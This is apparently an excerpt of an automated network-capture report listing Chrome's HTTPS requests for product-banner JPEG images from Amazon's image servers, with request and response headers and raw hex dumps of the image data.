                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3947
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 6b240525-7238-4ff7-8a7f-6fb7c1ed6f40
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 11 Apr 2022 11:01:52 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Wed, 23 Dec 2043 17:10:49 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 166025
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:07 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000103-IAD, cache-ewr-kewr1740078-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 95 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 00 03 04 07 02 06 08 01 09 10 00 01 03 02 04 01 09 03 07 08 0a 03 00 00 00 00 01 02 03 11 00 04 05 12 21 31 41 06 07 13 22 51 61 71 91 b1 14 b2 c1 23 32 72 81 82 a1 b3 15 42 53 73
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Qaq#2rBSs
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: e6 22 a7 8c 6a ed e1 0a ba 75 51 c0 be b3 03 f6 ab 4f f3 a7 9b b4 b1 6e 56 b1 63 2a 7a d2 fd 00 71 38 73 c1 3e 64 01 55 f3 fc f1 e0 60 90 15 70 7b ba 00 3d 56 2b 9f b0 c5 87 ee ed 5a bc 7d c6 98 5b c8 4b ae 17 14 32 24 9e b9 93 98 4a 47 71 8a 07 8f da d8 db bf 96 c2 e5 77 2d c6 ae 2d 9e 80 cc 99 01 39 94 48 1c 14 63 37 60 8a a9 d0 82 e5 63 a2 97 cf 1e 12 4f 51 bb 85 7d 86 c6 da fe 92 a0 2f 9e 3c 34 6d 6f 70 7c 4a 07 c4 d7 3f 5a 27 ac bf d5 b9 e9 4d b8 28 ec e2 5c ea fb 5f 3c 76 31 02 d1 d3 e2 ea 47 c0 d3 0a e7 99 89 d2 c9 71 fa f1 3e e5 50 8d 8d 4d 3c 91 47 6b 11 ce ba 3a cb 9d 8c 26 ea 12 ea 1e 6b c5 b0 e2 7c d0 4a bf eb 5b 53 5c b9 c1 9d 82 71 06 84 f6 e7 91 e2 9c b3 5c e7 83 bd 81 35 6e ef b7 37 70 5f 2d bf 05 2b 48 63 31 49 e8 20 40 5c 85 c1 56 62 53
                                                                                                                                                                                                        Data Ascii: "juQOnVc*zq8s>dU`p{=V+Z}[K2$JGqw--9Hc7`cOQ}/<4mop|J?Z'M(\_<v1Gq>PM<Gk:&k|J[S\q\5n7p_-+Hc1I @\VbS
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1191INData Raw: 4a 52 5f b4 f2 b2 88 59 1e b3 9f aa 77 dd a6 97 59 59 1f 94 70 76 36 ef bb 58 2e 99 09 72 7b 04 b9 c7 af ed 70 eb 34 85 3d 72 e2 52 80 4c 24 4e e5 47 58 09 12 4d 58 2f f3 49 8a 7e 55 46 0d 6a e3 4f be a4 3c a5 6a 5b 0d a5 9d d4 a9 9d 15 23 21 e3 55 be 0f 8a 3d 85 5c a2 ea d9 6a 6d e6 8c b6 ea 15 95 48 30 41 23 43 b8 31 5b 55 af 2f b1 5b 5b cf ca 0d de 3c 2e 32 29 1d 21 28 59 ca b8 2a 10 53 10 62 8d 80 bc 53 93 97 18 5d c9 b7 5a db 59 e8 c2 b3 25 70 00 92 08 21 40 14 ad 24 41 49 a0 7d 12 94 da dc 1f 31 26 09 91 be fb 6f 5b 5b 3c ac 5a 9e ba 7e e1 a6 ae 96 fa 60 9b 8b 64 ba 11 ac cb 70 a4 e5 51 e2 ad e8 77 e5 0b 61 66 f5 af b2 31 2e 2d 6a e9 cb 6b 0f 23 34 42 52 42 f2 e5 4c 68 22 8d 82 9f 9b f4 7e 02 ad fe 4d a6 6d 6d 87 fb 2d fb b5 50 ab 7f b2 3d 05 5c 7c
                                                                                                                                                                                                        Data Ascii: JR_YwYYpv6X.r{p4=rRL$NGXMX/I~UFjO<j[#!U=\jmH0A#C1[U/[[<.2)!(Y*SbS]ZY%p!@$AI}1&o[[<Z~`dpQwaf1.-jk#4BRBLh"~Mmm-P=\|


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        121192.168.2.44990018.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC378OUTGET /images/I/41MgROdin7L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC820INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 5433
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: e57f167c-6396-4773-8039-6dcb1d4e3b17
                                                                                                                                                                                                        Date: Mon, 12 Aug 2024 06:25:18 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 23 Mar 2023 01:01:58 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-103,/images/I/41MgROdin7L
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 06:25:18 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-103 /images/I/41MgROdin7L
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Via: 1.1 a1822b92cbf5d3516743d4786d5b6020.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 285169
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: 9l_oXIts9MOlPyaZeBvNoDi_Y2rw559yTa2zK9jshnrm8PP_zv8Qmg==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC5433INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 07 08 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 00 00 00 00 0a 72 be 55 cf af b7
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3,rU


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        122192.168.2.449906151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 4343
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: f31cae38-6f9a-40a8-9bb0-d59216863e6f
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 11 Apr 2022 11:01:53 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Tue, 01 Sep 2043 08:35:26 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1573880
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:07 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000151-IAD, cache-nyc-kteb1890081-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 a0 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 07 00 03 04 05 06 08 01 02 10 00 02 01 03 03 00 06 02 0d 07 09 08 03 00 00 00 01 02 03 00 04 11 05 12 21 06 13 22 31 41 51 32 74 07 14 15 23 61 71 73 81 91 a1 b2 b3 c1 25 52 72 83 93
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!"1AQ2t#aqs%Rr
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: a3 91 27 70 51 b7 77 a2 70 38 a1 2d d8 ec b9 f8 0d 6d 8d da e4 c3 34 93 e0 f7 43 e5 ff 00 53 f8 ad 6c a3 84 81 bb e0 ac 7e 88 3d f3 f5 7f 88 ad f5 af 64 29 f2 e6 b3 d4 f7 34 c3 d4 8e c8 00 1c f3 4e 07 07 e6 a6 9c 83 dc 2b e1 0f 78 a9 36 55 21 ee b6 95 35 ba 95 76 41 c4 e8 42 77 6c 3e 61 fe c9 a0 cf 41 87 e5 7d 4b d4 ed fe f1 a8 b7 67 36 fc 8f 10 4f cd b9 18 8f a4 0c d0 9f a1 23 1a c6 a3 ea 56 ff 00 78 d5 e8 3d 18 3b 46 97 59 fe bd e8 df e8 6a 7f 76 b5 73 a8 21 da 0e 38 24 d4 3d 4e c2 79 f5 6d 12 e6 34 cc 56 cb 7d d6 be 40 d9 d6 a2 aa 70 4e 4e e3 54 8b fd 7d ae 7a a6 9d ff 00 b2 a7 ab 8f bb 1c c9 ec c2 ff 00 ed 77 4b fd d0 7d a7 ae 7a 35 d0 7e cc 1c 5f 5c fa a7 e2 f5 cf 84 51 a5 ea ce a9 b4 79 4b 00 d2 a5 55 26 79 d5 af 95 49 86 e6 58 31 d5 48 e9 8f cd 76
                                                                                                                                                                                                        Data Ascii: 'pQwp8-m4CSl~=d)4N+x6U!5vABwl>aA}Kg6O#Vx=;FYjvs!8$=Nym4V}@pNNT}zwK}z5~_\QyKU&yIX1Hv
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: be 7d c8 8f f3 be b8 e9 53 65 12 7f 08 6a 76 00 54 4e 87 cb 8d 6b 53 3f dc a0 fb d3 4d 4f 36 2a 17 45 e4 ea f5 4d 55 bc ac 61 fb d3 5a 64 f8 21 05 fa 37 ba bf 49 0d 94 53 c8 a3 76 c4 6f 84 03 e0 5b c7 00 f2 68 7d d0 7e 99 5d dd de 2c 73 ca 65 49 bc f1 9f 20 dc 91 b7 eb 2e b8 c0 e4 57 cd b6 ad 1d c5 d4 a2 62 02 63 b4 4f 20 06 21 49 23 9c 80 3b e8 b9 66 ba 65 94 52 ef 85 13 2a c7 74 71 22 82 bb 7b b2 a0 1c 6d 15 9e ee 4e f7 2b 2a 7a 04 5d 3d d4 e2 b9 be 98 c4 19 ba 8b 62 a4 e3 87 29 bd ce d3 e2 39 c6 7b b8 35 06 de ce 2b c5 e5 dd 72 07 2a 01 ad a6 93 a0 69 1d 21 8c 4d 3c 7b e5 bd 46 0d 22 ca 63 71 b8 60 b0 00 81 9c 0c e7 04 f9 e4 e6 87 3d 1f ba 2c 02 e7 76 d2 46 7c f6 f1 51 95 08 b9 39 cb b2 d0 ad 51 2c 6e 10 6d bd 8d 21 d5 6d 92 56 bc 95 04 a0 f6 42 29 23
                                                                                                                                                                                                        Data Ascii: }SejvTNkS?MO6*EMUaZd!7ISvo[h}~],seI .WbcO !I#;feR*tq"{mN+*z]=b)9{5+r*i!M<{F"cq`=,vF|Q9Q,nm!mVB)#
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC209INData Raw: f8 ec d1 53 40 f6 fe 35 4b 89 42 8c 0d c3 81 c0 e4 02 69 cb 58 16 52 77 78 52 a5 5e fd 59 b5 e2 5d 3e 6c 8f 3e 11 4e ad 99 68 b6 f1 05 ce c1 f3 8c d5 a5 b6 91 6f 76 4a 15 d9 c7 a4 9d 93 f4 72 bf 55 2a 55 e3 d2 f2 6a fc b1 fd 33 65 4a 71 c5 f0 62 b3 5e 31 a5 4a be 8c f3 88 d2 54 16 3c d2 a5 5c 02 bf 52 3d 81 42 ae 97 f3 0a fc f4 a9 57 74 15 b3 5c 7b cf c7 5b 9e 83 f3 a9 c3 f2 73 fd 83 4a 95 43 b3 4f 46 db 58 62 1c 50 ab a4 9a 5c 5a b5 d5 9c 73 e4 61 64 01 95 8a 91 b8 a0 34 a9 51 3b a3 21 d2 8e 8e 43 a0 95 30 4b 23 96 0b e9 b0 6f f2 55 ad a7 45 25 61 6f a7 7f d5 14 a4 9f d7 48 29 52 ae 60 41 4f 27 ce 95 2a 55 c1 3f ff d9
                                                                                                                                                                                                        Data Ascii: S@5KBiXRwxR^Y]>l>NhovJrU*Uj3eJqb^1JT<\R=BWt\{[sJCOFXbP\Zsad4Q;!C0K#oUE%aoH)R`AO'*U?


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        123192.168.2.449912151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3157
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 69bbbb5d-e882-4f95-9814-0dd6e845a40f
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 11 Apr 2022 11:01:52 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sun, 27 Sep 2043 15:44:25 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 592259
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:07 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200023-IAD, cache-ewr-kewr1740040-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 91 03 01 22 00 02 11 01 03 11 01 ff c4 00 95 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 03 00 04 05 06 01 02 07 08 10 00 02 01 03 01 04 07 04 06 08 03 09 00 00 00 00 01 02 03 00 04 11 12 05 21 31 41 06 51 61 71 81 91 a1 13 22 32 b1 14 52 72 82 b2 d1 07 15 24 33 73 92 a2
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQaq"2Rr$3s
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1378INData Raw: 00 00 27 70 1b 87 1a a4 fc 74 96 3d 8b 1f 25 be e1 51 8a f2 07 d6 b6 32 e4 e4 8f 5c 1f 5a 16 8e d3 43 9a 54 81 75 ca ea 8b d6 c4 28 a9 f7 92 28 18 ae 7b 07 76 7f 3a 71 6f 18 04 15 90 83 ff 00 4b 10 7c 81 aa 85 c7 49 61 5c 88 10 ca 7a fe 04 f3 c6 af 41 55 fb cd af 79 76 b2 06 93 40 c1 f7 63 f7 7d 77 b1 f3 a6 59 98 7b 3a f7 eb 19 62 c8 0d 9f b7 83 59 5d b5 20 dc 63 0e 7a 97 20 fa e4 53 55 95 00 09 1c 78 45 00 0c 0a 20 d3 b9 71 f7 6a cb 2c 97 d3 3c 71 fa 87 5f ae 24 ff 00 96 6f fc 89 4a 9a fd 18 7f a2 29 56 fe 44 c5 f0 c4 8d 8b 62 99 86 17 5e 3a d7 dc f5 e2 2a 5e d7 a3 91 c5 c8 03 d6 73 2b 79 b1 ab 46 2b 15 78 f0 e2 b6 42 5c d9 bd 1c 0f f4 85 0a c1 b4 74 29 dd ec 61 aa 5e c2 71 f4 fe 24 62 27 de 06 ae 3a 47 bc bc d4 f3 1b 89 ae a1 d3 ee 8e 5e df dd b5 d4 71
                                                                                                                                                                                                        Data Ascii: 'pt=%Q2\ZCTu(({v:qoK|Ia\zAUyv@c}wY{:bY] cz SUxE qj,<q_$oJ)VDb^:*^s+yF+xB\t)a^q$b':G^q
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC401INData Raw: 9a b2 ee 35 e9 3b 2b d1 79 0c 13 8f f8 b1 c6 df ce a1 8d 72 9d b1 b0 e5 da 73 ac f1 95 46 2a 03 92 09 d7 8d ca 7b c0 dc 7a c0 15 78 d8 30 49 65 69 05 bc 8c 19 a2 0c 35 01 81 82 c5 87 90 38 a9 61 c5 28 4e 4b e1 4c b9 14 e2 9f d2 d6 1a b7 e3 4c d1 e8 a1 ab a0 80 7c 52 a1 e4 52 a0 0c d6 08 a8 bb 6b b7 51 a6 63 ab a9 c0 c1 3f 69 46 ef 11 8c fd 51 52 51 ca b2 64 a3 06 c7 1c 1c e3 bf aa 96 39 63 2d 0d 2c 52 8e cc 14 a6 e6 2a 79 58 c6 69 85 23 de 11 4d 5e 1a 95 68 e8 66 31 45 05 90 72 5b 66 98 49 64 2a cc d1 d3 76 80 56 50 ca 45 42 6b 32 29 a9 8b 4f 2a b8 3d b9 34 ca 5b 5e ca ca 1b b1 51 bd 8f 55 b5 c0 3c e2 93 f0 9a 8d d8 03 54 52 7d bf ec 2a e1 3e cc 69 55 94 1f 88 30 f3 18 a8 9d 83 b0 ae 6d a3 71 70 a1 49 61 8c 30 6e 5d 99 a9 b8 be e9 8c a6 ba b1 d2 5b 93 52
                                                                                                                                                                                                        Data Ascii: 5;+yrsF*{zx0Iei58a(NKLL|RRkQc?iFQRQd9c-,R*yXi#M^hf1Er[fId*vVPEBk2)O*=4[^QU<TR}*>iU0mqpIa0n][R


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        124192.168.2.449913151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC716OUTGET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3783
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 9471e278-00a4-4f42-8db7-f1f15707d15a
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 11 Apr 2022 11:01:53 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Mon, 25 Jan 2044 07:19:39 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 855646
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:07 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100034-IAD, cache-ewr-kewr1740047-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
